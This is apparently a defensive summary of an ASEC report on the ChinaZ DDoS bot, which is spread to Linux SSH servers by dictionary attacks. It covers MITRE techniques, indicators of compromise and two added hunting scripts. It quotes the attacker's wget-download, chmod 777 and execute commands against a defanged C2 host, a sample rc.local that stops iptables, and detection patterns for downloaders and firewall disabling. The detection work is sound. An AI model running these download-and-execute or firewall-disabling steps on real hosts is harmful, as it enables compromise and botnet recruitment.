ChinaZ DDoS Bot Malware Distributed to Linux SSH Servers – ASEC BLOG

The ChinaZ DDoS bot has been found installed on poorly managed Linux SSH servers, turning compromised hosts into bots that carry out DDoS attacks on command. The article covers the Linux and Windows variants, their C2 communications, the persistence mechanism, and guidance for defenders on preventing such infections.
#ChinaZ #DDoSClient #LinuxSSH

Keypoints

  • ChinaZ DDoSClient is deployed on inadequately managed Linux SSH servers, enabling a botnet for DDoS operations.
  • Threat actors use SSH brute-force/dictionary attacks after port scanning (port 22) to gain initial access.
  • Once inside, the malware is installed (often via wget), made persistent (rc.local), and may disable defenses such as iptables.
  • Linux and Windows variants disguise themselves (e.g., as “declient”) and collect system information before reporting to C2.
  • ChinaZ supports multiple DDoS commands (SYN, UDP, ICMP, DNS Floods) and can be instructed to change C2 addresses or update CPU limits.
  • Defensive guidance: use strong SSH passwords, patch promptly, put a firewall in front of SSH, and keep security software at its latest version so the dropped binaries are detected.

MITRE Techniques

  • [T1046] Network Service Discovery (formerly Network Service Scanning) – The threat actor scanned port 22 to find hosts with an exposed SSH service before launching the dictionary attack. “scanned port 22, the area where SSH services operate, before finding an active SSH service and performing a dictionary attack using commonly used SSH account credentials.”
  • [T1110] Brute Force – Dictionary attack using commonly used SSH account credentials to gain access.
  • [T1105] Ingress Tool Transfer – The threat actor used wget to download ChinaZ (e.g., “wget hxxp://45.113.163[.]219/linux64”).
  • [T1059.004] Unix Shell – After gaining access, the attacker runs shell commands to install and execute the malware (e.g., “chmod 777 linux64” and “./linux64”).
  • [T1036] Masquerading – ChinaZ disguises itself as “declient” by setting the process name to that value. “disguises itself with the name ‘declient’.”
  • [T1037.004] Boot or Logon Initialization Scripts: RC Scripts (the sub-technique that names rc.local, rather than the broader T1547 Boot or Logon Autostart Execution) – Persistence achieved by registering the binary in rc.local so it is launched on every boot. “registered to rc.local to maintain persistence so that it would operate even after reboots.”
  • [T1027] Obfuscated Files or Information – The C&C address is stored encoded in ChinaZ and decoded by a routine at runtime, so it does not appear as a plain string in the binary. “The C&C server address is encoded in ChinaZ, but it can easily be retrieved through a decryption routine…”
  • [T1041] Exfiltration Over C2 Channel – On check-in, ChinaZ sends the infected host’s details to the C2 in a LOGININFO struct through its SendOnlineInfo routine (gathering those details is [T1082] System Information Discovery). “The information that is transmitted is LOGININFO struct and it has the following structure.”
  • [T1498] Network Denial of Service – ChinaZ performs SYN, UDP, ICMP and DNS floods on command from the C2. The UDP/ICMP/DNS floods are direct network floods (T1498.001); a SYN flood that exhausts the target’s connection table is [T1499.001] Endpoint Denial of Service: OS Exhaustion Flood. “Most of the commands supported by the DDoS bot, ChinaZ, are characteristically DDoS attack commands.”
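The following hunting script is an added example written for this summary; it is not code from the ASEC post or from ChinaZ. It turns the chain above into three checks a responder can run on a suspect Linux host: SSH sources with repeated failures followed by an accepted login (the dictionary attack), rc.local lines that launch binaries from temp directories, call wget/curl, chmod 777 or stop iptables (persistence and defense evasion), and processes whose kernel comm name is "declient" or differs from their executable (the masquerading). The log lines, rc.local contents, the threshold of five failures and the path /tmp/linux64 are constructed assumptions, not indicators from the post.

```shell
#!/bin/sh
# Added hunting helpers for the ChinaZ SSH-bot chain summarised above.
# Not code from the ASEC post or the malware; thresholds, file paths and the
# sample data below are assumptions chosen for illustration.

# Constructed sshd log lines: 203.0.113.7 fails five times and then logs in,
# 198.51.100.2 is one mistyped password followed by a key-based login.
SAMPLE_AUTH_LOG='Jun  1 10:00:01 host sshd[1201]: Failed password for root from 203.0.113.7 port 51122 ssh2
Jun  1 10:00:02 host sshd[1202]: Failed password for root from 203.0.113.7 port 51123 ssh2
Jun  1 10:00:04 host sshd[1203]: Failed password for invalid user admin from 203.0.113.7 port 51124 ssh2
Jun  1 10:00:05 host sshd[1204]: Failed password for root from 203.0.113.7 port 51125 ssh2
Jun  1 10:00:07 host sshd[1205]: Failed password for root from 203.0.113.7 port 51126 ssh2
Jun  1 10:00:09 host sshd[1210]: Accepted password for root from 203.0.113.7 port 51130 ssh2
Jun  1 10:01:00 host sshd[1222]: Failed password for deploy from 198.51.100.2 port 40000 ssh2
Jun  1 10:01:03 host sshd[1223]: Accepted publickey for deploy from 198.51.100.2 port 40002 ssh2'

# Constructed rc.local showing the persistence and iptables steps.
SAMPLE_RC_LOCAL='#!/bin/sh -e
# rc.local (constructed example)
service iptables stop
/tmp/linux64 &
exit 0'

# 1. Dictionary attack that succeeded (T1110): read sshd lines on stdin and
#    print "IP failures" for every source that failed at least $1 times
#    before an accepted login. Sources that never succeed are noise here;
#    the one that did is the host to triage first.
ssh_bruteforce_then_success() {
    awk -v t="${1:-5}" '
        /sshd\[[0-9]+\]: Failed password/ {
            for (i = 1; i <= NF; i++) if ($i == "from") fails[$(i + 1)]++
        }
        /sshd\[[0-9]+\]: Accepted (password|publickey)/ {
            for (i = 1; i <= NF; i++)
                if ($i == "from" && fails[$(i + 1)] >= t)
                    printf "%s %d\n", $(i + 1), fails[$(i + 1)]
        }'
}

# 2. Persistence and defense evasion in an rc script (T1037.004): print each
#    non-comment line of $1 that matches a pattern, prefixed with the reason.
audit_rc_local() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }
        /(^|[ \t;&|])\/(tmp|var\/tmp|dev\/shm)\// { print "exec-from-tmp: " $0; next }
        /chmod[ \t]+[0-7]*777/                  { print "world-writable-chmod: " $0; next }
        /(wget|curl)[ \t]/                       { print "downloader: " $0; next }
        /iptables[ \t]+(-F|--flush)|service[ \t]+iptables[ \t]+stop|systemctl[ \t]+(stop|disable)[ \t]+iptables|\/etc\/init\.d\/iptables[ \t]+stop/ {
            print "firewall-disabled: " $0; next }
    ' "$1"
}

# 3. Masquerading (T1036): ChinaZ sets its process name to "declient", but
#    /proc/<pid>/exe still points at the real binary. Report any process whose
#    comm is on the watch list or differs from the executable's basename.
#    $1 overrides /proc so the check can be run against a constructed tree.
find_masquerading_procs() {
    proc="${1:-/proc}"
    for d in "$proc"/[0-9]*; do
        [ -r "$d/comm" ] || continue
        comm=$(cat "$d/comm")
        exe=$(readlink "$d/exe" 2>/dev/null) || continue   # kernel threads have no exe
        base=${exe##*/}
        base=${base%" (deleted)"}               # dropper unlinked after launch
        pid=${d##*/}
        case "$comm" in
            declient) echo "watchlist pid=$pid comm=$comm exe=$exe"; continue ;;
        esac
        # comm is truncated to 15 bytes, so compare against the same prefix.
        [ "$comm" = "$(printf '%.15s' "$base")" ] || echo "mismatch pid=$pid comm=$comm exe=$exe"
    done
    return 0
}

# Stand-alone demo over the constructed samples; run find_masquerading_procs
# with no argument to check the live /proc of a real host.
printf '%s\n' "$SAMPLE_AUTH_LOG" | ssh_bruteforce_then_success 5
tmp_rc=$(mktemp) && printf '%s\n' "$SAMPLE_RC_LOCAL" > "$tmp_rc" && audit_rc_local "$tmp_rc"; rm -f "$tmp_rc"
```

On a real host, feed `/var/log/auth.log` or `journalctl -u ssh` to the first function, pass `/etc/rc.local` to the second, and run the third without arguments; a `mismatch` hit for a long-named legitimate binary is expected only if the name disagrees within its first 15 bytes.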

Indicators of Compromise

  • [MD5] Linux x86 (linux32) – c69f5eb555cc10f050375353c205d5fa
  • [MD5] Linux x64 (linux64) – c9eb0815129c135db5bbb8ac79686b9a
  • [MD5] Windows x86 (win32) – 2ec7348e6b6b32d50a01c3ffe480ef70
  • [URL] Linux x86 (linux32) download – hxxp://45.113.163[.]219/linux32
  • [URL] Linux x64 (linux64) download – hxxp://45.113.163[.]219/linux64
  • [URL] Windows x86 (win32) download – hxxp://45.113.163[.]219/win32
  • [IP:Port] C2 address – 45.113.163[.]219:29134
  • [Domain:Port] C2 domain – www[.]911ddos[.]com:10912
  • [Signature] Linux detection names – Linux/Ddos.1571389, Linux/Ddos.1806356
  • [Signature] Windows detection name – Trojan/Win32.Agent.R192331
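A sweep against the indicators above, as an added example that is not part of the ASEC post: it hashes files in the usual drop directories against the three MD5s, picks out connections to the C2 IP on either listed port from `ss -ntp` output, and searches resolver or proxy logs for the C2 domain. The defanging brackets are removed in the script so the values match real data; the ss output and the files used in the demo are constructed.

```shell
#!/bin/sh
# Added example: sweep a host against the IOCs listed above. Not code from
# the ASEC post. The MD5s, C2 IP, ports and domain are the listed indicators;
# the ss(8) output and the files used in the demo are constructed.

# MD5s of the three payloads (linux32, linux64, win32).
CHINAZ_MD5S='c69f5eb555cc10f050375353c205d5fa
c9eb0815129c135db5bbb8ac79686b9a
2ec7348e6b6b32d50a01c3ffe480ef70'

# C2 endpoints, with the defanging brackets removed so they can be matched.
CHINAZ_C2_IP='45.113.163.219'
CHINAZ_C2_PORTS='29134 10912'
CHINAZ_C2_DOMAIN='www.911ddos.com'

# Hex MD5 of a file, using whichever tool the host provides.
md5_of() {
    if command -v md5sum >/dev/null 2>&1; then md5sum "$1" | awk '{ print $1 }'
    else md5 -q "$1"; fi
}

# Hash every regular file under the given directories and print "md5 path"
# for each digest found in the newline-separated list $1. Defaults to the
# places an SSH bot is typically dropped after "wget ... && chmod 777 && ./linux64".
match_ioc_hashes() {
    hashes="$1"; shift
    [ $# -gt 0 ] || set -- /tmp /var/tmp /dev/shm /root
    find "$@" -type f 2>/dev/null | while IFS= read -r f; do
        h=$(md5_of "$f")
        [ -n "$h" ] || continue          # no hashing tool: never match on an empty string
        case "$hashes" in *"$h"*) printf '%s %s\n' "$h" "$f" ;; esac
    done
    return 0
}

# Read `ss -ntp` (or `netstat -ntp`) output on stdin and print the lines whose
# peer is the C2 IP on one of the listed ports; the process column then names
# the bot (which calls itself "declient").
match_c2_connections() {
    awk -v ip="$CHINAZ_C2_IP" -v ports="$CHINAZ_C2_PORTS" '
        BEGIN { n = split(ports, p, " "); for (i = 1; i <= n; i++) want[ip ":" p[i]] = 1 }
        { for (i = 1; i <= NF; i++) if ($i in want) { print; break } }'
}

# Read resolver logs, /etc/hosts or proxy logs on stdin and print lines that
# mention the C2 domain (fixed-string match, so the dots are literal).
match_c2_domain() {
    grep -F -- "$CHINAZ_C2_DOMAIN" || true
}

# Constructed ss -ntp output: one bot connection and one legitimate SSH session.
SAMPLE_SS='State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 10.0.0.5:41234 45.113.163.219:29134 users:(("declient",pid=4242,fd=3))
ESTAB 0 0 10.0.0.5:22 198.51.100.2:40002 users:(("sshd",pid=4243,fd=4))'

# Stand-alone demo: the bot connection is printed; the constructed benign file
# produces no hash hit. On a real host call match_ioc_hashes "$CHINAZ_MD5S"
# with no directories to sweep the default drop locations.
printf '%s\n' "$SAMPLE_SS" | match_c2_connections
demo_dir=$(mktemp -d)
printf 'not the bot\n' > "$demo_dir/linux64"
match_ioc_hashes "$CHINAZ_MD5S" "$demo_dir"
rm -rf "$demo_dir"
```

Hash matching only catches the exact samples listed; the behavioural checks (rc.local entries, the "declient" process name, the iptables change) remain the more durable signal once the actor rebuilds the binaries.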

Read more: https://asec.ahnlab.com/en/50316/